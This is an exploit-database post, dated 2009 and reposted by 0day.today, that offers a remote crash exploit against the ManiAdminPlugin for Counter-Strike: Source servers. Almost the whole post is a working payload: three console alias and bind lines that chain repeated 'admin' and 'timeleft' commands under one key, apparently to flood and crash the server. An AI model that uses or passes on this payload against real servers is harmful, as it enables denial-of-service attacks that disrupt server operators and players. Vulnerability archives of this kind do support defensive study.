id: 6846
date: 04/21/2009
title: Counter Strike Source ManiAdminPlugin v2 Remote Crash Exploit
author: M4rt1n
cves: 

=============================================================
Counter Strike Source ManiAdminPlugin v2 Remote Crash Exploit
=============================================================



@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@     Counter strike source         @@@@@
@@@@@     Mani Admin Plugin Exploit v2  @@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

alias aspam "admin;admin;admin;admin;admin;admin;admin;timeleft;timeleft;timeleft"
alias bspam "aspam;aspam;aspam;aspam;aspam"
bind i "bspam; bspam; bspam"



#  0day.today [2023-03-24]  #